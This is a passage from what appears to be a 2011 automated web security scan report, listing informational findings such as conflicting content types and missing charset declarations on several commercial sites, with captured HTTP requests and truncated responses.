Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQQASDQQ=MNOLHEFCGKBHGOHLANCBPEKB; CriticalWatch_WinMgmt=1ea476ea-f298-43b7-b986-76b4c2ad1a2b; ASP.NET_SessionId=ldofgy3miecclj01ixxgal4x

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Mon, 25 Apr 2011 12:54:54 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Mon, 25 Apr 2011 12:54:53 GMT
Content-Length: 33838

<html>
<head id="htmlHead">
</head>
<body onload="sClock();">
<form method="post" action="DesktopDefault.aspx" id="ctl00">
<div class="aspNetHidden">
<input type="hidden" name="__EVENTTARGET"
...[SNIP]...

29.23. https://www.manageengine.com/network-performance-management.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.manageengine.com
Path:	/network-performance-management.html

Request

Response

29.24. https://www.manageengine.com/products/security-manager/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.manageengine.com
Path:	/products/security-manager/index.html

Request

Response

29.25. https://www.manageengine.com/products/security-manager/security-manager-forum.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.manageengine.com
Path:	/products/security-manager/security-manager-forum.html

Request

GET /products/security-manager/security-manager-forum.html HTTP/1.1
Host: www.manageengine.com
Connection: keep-alive
Referer: https://www.manageengine.com/products/security-manager/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.12.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:13:52 GMT
Server: Apache
Last-Modified: Mon, 21 Feb 2011 10:23:28 GMT
ETag: "256-49cc841318800"
Accept-Ranges: bytes
Cache-Control: max-age=-4845024
Expires: Mon, 28 Feb 2011 10:23:28 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 598

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

30. Multiple content types specified previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://system.netsuite.com
Path:	/javascript/NLPortal.jsp__z=f4d6ccdb90.nlqs

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Content-Type: text/javascript; charset=UTF-8
text/html; charset=utf-8

Request

GET /javascript/NLPortal.jsp__z=f4d6ccdb90.nlqs HTTP/1.1
Host: system.netsuite.com
Connection: keep-alive
Referer: https://system.netsuite.com/pages/customerlogin.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bn_u=6923519460848807096; mbox=session#1303736347554-914602#1303744342|PC#1303736347554-914602.17#1366814482|check#true#1303742542

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:48:32 GMT
Server: Apache
Expires: Tue, 26 Apr 2011 06:15:32 GMT
Last-Modified: Fri, 22 Apr 2011 00:09:09 GMT
NS_RTIMER_COMPOSITE: 239240273:616363742D6A6176613037392E7376616C652E6E65746C65646765722E636F6D:80
encoding: UTF-8
Content-Language: UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=969
Connection: Keep-Alive
Content-Type: text/javascript; charset=UTF-8
Content-Length: 4552

function getQueryParameter(param)
{
var idx = document.URL.indexOf(param+"=");
if (idx != -1)
{
var sidx = idx+param.length+1;
var len = document.URL.substring(sidx).indexOf("&"
...[SNIP]...
</title><meta http-equiv='Content-Type' content='text/html; charset=utf-8'>"+
"<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=0&bglt=F2F4F6&bgmd=E0E4E8&bgdk=737A82&bgon=C1C8D2&bgoff=8492A5&bgbar=C1C8D2&tasktitletext=000000&crumbtext=000000&headertext=000000&
...[SNIP]...

31. HTML does not specify charset previous next
There are 29 instances of this issue:

https://customer.kronos.com/
https://customer.kronos.com/Default.asp
https://customer.kronos.com/portalproblems.asp
https://customer.kronos.com/user/forgotpassword.asp
https://customer.kronos.com/user/forgotusername.asp
https://customer.kronos.com/user/logindenied.asp
https://employer.unicru.com/asp/home/login.asp
http://foreign.dt00.net/zones/zone1.php
http://foreign.dt00.net/zones/zone23.php
http://foreign.dt00.net/zones/zone25.php
http://foreign.dt00.net/zones/zone40.php
http://goods.adnectar.com/static/quantcast_1.html
http://kino.webalta.ru/banners.xml
http://kroogy.com/favicon.ico
http://my.webalta.ru/feed/l.php
http://my.webalta.ru/public/visual/themes/css.php
http://now.eloqua.com/visitor/v200/svrGP.aspx
http://www.igotyouremail.com/igye_conversion.php
http://www.praetorian.com/contactus.html
http://www.praetorian.com/external-network-penetration-test.html
http://www.praetorian.com/images/fieldbg.gif
http://www.smpone.com/javascript/common.php
http://www.smpone.com/javascript/image_pop.php
http://www.smpone.com/javascript/showimages.php
http://www.tresware.com/javascript/bbcode.php
http://www.tresware.com/javascript/common.php
http://www.tresware.com/javascript/edittags.php
http://www.tresware.com/javascript/image_pop.php
http://www.tresware.com/javascript/showimages.php

31.1. https://customer.kronos.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://customer.kronos.com
Path:	/

Request

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:16:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 17287
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: ICRedirect=Url=; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
</title>

<meta http-equiv="Content-Type" content="text/html;">
<link rel="stylesheet" href="/includes/local.css" type="text/css">
...[SNIP]...

31.2. https://customer.kronos.com/Default.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://customer.kronos.com
Path:	/Default.asp

Request

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 17287
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: ICRedirect=Url=; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
</title>

<meta http-equiv="Content-Type" content="text/html;">
<link rel="stylesheet" href="/includes/local.css" type="text/css">
...[SNIP]...

31.3. https://customer.kronos.com/portalproblems.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://customer.kronos.com
Path:	/portalproblems.asp

Request

GET /portalproblems.asp HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
Referer: https://customer.kronos.com/user/logindenied.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL; ICRedirect=Url=; mbox=session#1303738433760-48782#1303741379|check#true#1303739579; s_cc=true; s_nr=1303739518621; s_invisit=true; s_lv=1303739518623; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.8.10.1303738437; Visitor=173%2E193%2E214%2E243

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:52:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 11576
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
</title>

<meta http-equiv="Content-Type" content="text/html;">
<link rel="stylesheet" href="/includes/local.css" type="text/css">
...[SNIP]...

31.4. https://customer.kronos.com/user/forgotpassword.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://customer.kronos.com
Path:	/user/forgotpassword.asp

Request

Response

31.5. https://customer.kronos.com/user/forgotusername.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://customer.kronos.com
Path:	/user/forgotusername.asp

Request

Response

31.6. https://customer.kronos.com/user/logindenied.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://customer.kronos.com
Path:	/user/logindenied.asp

Request

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:51:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 16169
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: Visitor=173%2E193%2E214%2E243; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
</TITLE>

<META http-equiv="Content-Type" content="text/html;">
<LINK rel="stylesheet" href="/includes/local.css" type="text/css">
...[SNIP]...

31.7. https://employer.unicru.com/asp/home/login.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://employer.unicru.com
Path:	/asp/home/login.asp

Request

Response

31.8. http://foreign.dt00.net/zones/zone1.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://foreign.dt00.net
Path:	/zones/zone1.php

Request

GET /zones/zone1.php?country=4&region=0 HTTP/1.1
Host: foreign.dt00.net
Proxy-Connection: keep-alive
Referer: http://foreign.dt00.net/foreign/top.php?site=3&cat=30&red=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:02 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 313

document.write('<a href="http://foreign.dt00.net/click.php?id=308&zone=1&country=4" target="_blank"><img src="http://img.dt00.net/foreign/166.gif" alt=".................." border="0" /></a><i
...[SNIP]...

31.9. http://foreign.dt00.net/zones/zone23.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://foreign.dt00.net
Path:	/zones/zone23.php

Request

GET /zones/zone23.php?country=4&region=0 HTTP/1.1
Host: foreign.dt00.net
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:32:50 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 502

document.write('<ul class="hmenu-1 clearfix hmactive-5 mt"><li class="tm-5"><span>......................</span></li></ul> <div class="l-block">');document.write('<a href="http://foreign.dt00.net/cli
...[SNIP]...

31.10. http://foreign.dt00.net/zones/zone25.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://foreign.dt00.net
Path:	/zones/zone25.php

Request

Response

31.11. http://foreign.dt00.net/zones/zone40.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://foreign.dt00.net
Path:	/zones/zone40.php

Request

GET /zones/zone40.php?country=4&region=0 HTTP/1.1
Host: foreign.dt00.net
Proxy-Connection: keep-alive
Referer: http://foreign.dt00.net/foreign/right_premium.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:03 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 536

document.write('<style type="text/css"> @import "http://oth.dt00.net/css/global/global.css"; </style> <ul class="box-title cr-5"><li class="cr-5"><span>..............</span></li></ul> <div class=
...[SNIP]...

31.12. http://goods.adnectar.com/static/quantcast_1.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://goods.adnectar.com
Path:	/static/quantcast_1.html

Request

Response

31.13. http://kino.webalta.ru/banners.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://kino.webalta.ru
Path:	/banners.xml

Request

GET /banners.xml HTTP/1.1
Host: kino.webalta.ru
Proxy-Connection: keep-alive
Referer: http://kino.webalta.ru/sc/l/banroll.swf?xml_path=/banners.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218; pogoda_reg=10290

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:20:33 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 3802

<?xml version="1.0" encoding="utf-8"?>
<flash_parameters copyright="anvsoftPFMTheme">
<preferences>
<golbal>
<basic_property movieWidth="620" movieHeight="348" html_title="Title" loadStyle
...[SNIP]...

31.14. http://kroogy.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://kroogy.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303658380.5.3.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=221607367.144172721.1303647943.1303658380.1303738749.6; __utmc=221607367; __utmb=221607367.1.10.1303738749

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:38:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2090

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...

31.15. http://my.webalta.ru/feed/l.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://my.webalta.ru
Path:	/feed/l.php

Request

GET /feed/l.php?url=&id=80 HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.4.10.1303741218; WEB_CH_C=webalta_cookies

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:09:20 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
X-Powered-By: PHP/5.2.9
Content-Length: 59948

... ...<?xml version="1.0" encoding="utf-8"?><response type="gameboss ver2.0"><result type="games">
<ITEM>
<ID>1093</ID>
<RATE>9999</RATE>
<NAME_URL>vanishing_hitchhiker_rus</NAME_URL>
<TYPE>65</TYP
...[SNIP]...

31.16. http://my.webalta.ru/public/visual/themes/css.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://my.webalta.ru
Path:	/public/visual/themes/css.php

Request

GET /public/visual/themes/css.php?st=theme1 HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.4.10.1303741218; WEB_CH_C=webalta_cookies

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:30:19 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
X-Powered-By: PHP/5.2.9
Content-Length: 170

.../* .... .....
*/
.theme_header { background: #7A96A7 url("/public/visual/themes/theme1/top.png"); }

/* .... ....
*/
.theme_body { background: #52677A; }

31.17. http://now.eloqua.com/visitor/v200/svrGP.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://now.eloqua.com
Path:	/visitor/v200/svrGP.aspx

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=2208&ref2=elqNone&tzo=360&ms=121 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=8EE1D10DCCE142B68BB195EB59D8F5BA; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 12:52:48 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

31.18. http://www.igotyouremail.com/igye_conversion.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.igotyouremail.com
Path:	/igye_conversion.php

Request

GET /igye_conversion.php?pg=Website%20Development%20%7C%20Web%20Content%20Management%20%7C%20CMS%20%7C%20Web%20Design%20%7C%20New%20Jersey%20Custom%20Website%20Development%20%7C%20New%20Jersey%20Website%20Development%20%7C%203D%20Animation%20%7C%20Medical%20Animation&ref=&url=http%3A//www.tresware.com/&gl=&vl=0&s=null&q=null HTTP/1.1
Host: www.igotyouremail.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 12:18:24 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 07 Dec 2010 21:27:20 GMT
ETag: "31f063e-3c8-496d8ab6d1e00"
Accept-Ranges: bytes
Content-Length: 968
Connection: close
Content-Type: text/html

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at kelmarkfurnishings.com
</ADDRESS>
</B
...[SNIP]...

31.19. http://www.praetorian.com/contactus.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.praetorian.com
Path:	/contactus.html

Request

Response

31.20. http://www.praetorian.com/external-network-penetration-test.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.praetorian.com
Path:	/external-network-penetration-test.html

Request

Response

31.21. http://www.praetorian.com/images/fieldbg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.praetorian.com
Path:	/images/fieldbg.gif

Request

GET /images/fieldbg.gif HTTP/1.1
Host: www.praetorian.com
Proxy-Connection: keep-alive
Referer: http://www.praetorian.com/contactus.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116139463.1303735969.2.2.utmgclid=CO7VhZ_Pt6gCFaNd5Qodk1B4BQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=116139463.239124078.1303732836.1303732836.1303735969.2; __utmc=116139463; __utmb=116139463.1.10.1303735969

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 13:09:56 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1317
Connection: close
Content-Type: text/html

<HTML>
   <HEAD><TITLE>Page Not Found</TITLE></HEAD>

   <BODY BGCOLOR="#FFFFFF" LINK="maroon" VLINK="maroon"
ALINK="maroon">
   <CENTER>
   <TABLE WIDTH="85%" BORDER="1" BORDERCOLOR="#000000"
CELLSPACING="
...[SNIP]...

31.22. http://www.smpone.com/javascript/common.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smpone.com
Path:	/javascript/common.php

Request

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:17:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 5596

/*************************************************
   . Copyright 2006 - 2009 Tres Media Group, Inc.
   The code contained within cannot be reproduced
   or modified without the expressed permission o
...[SNIP]...

31.23. http://www.smpone.com/javascript/image_pop.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smpone.com
Path:	/javascript/image_pop.php

Request

GET /javascript/image_pop.php HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/?gclid=CLbB86LPt6gCFSIRNAod2E3lCQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.1.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733867

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:17:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 2298

// <a href="me.jpg" onclick="return popImage(this.href,'Site author');">link</a>

//really not important (the first two should be small for Opera's sake)
PositionX = 10;
PositionY = 10;
defaultWi
...[SNIP]...

31.24. http://www.smpone.com/javascript/showimages.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smpone.com
Path:	/javascript/showimages.php

Request

GET /javascript/showimages.php HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/?gclid=CLbB86LPt6gCFSIRNAod2E3lCQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.1.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733867

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:17:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 317

function showimage() {
   if (!document.images)
       return
       document.images.avatar.src= 'images/Avatars/' + document.Register.av_avatar_pre.options[document.Register.av_avatar_pre.selectedIndex].value
...[SNIP]...

31.25. http://www.tresware.com/javascript/bbcode.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tresware.com
Path:	/javascript/bbcode.php

Request

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 2394

function x() {
   return;
}

var thisForm;

function mozWrap(txtarea, lft, rgt, pmt, pmr) {
   var selLength = txtarea.textLength;
   var selStart = txtarea.selectionStart;
   var selEnd = txtarea.se
...[SNIP]...

31.26. http://www.tresware.com/javascript/common.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tresware.com
Path:	/javascript/common.php

Request

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
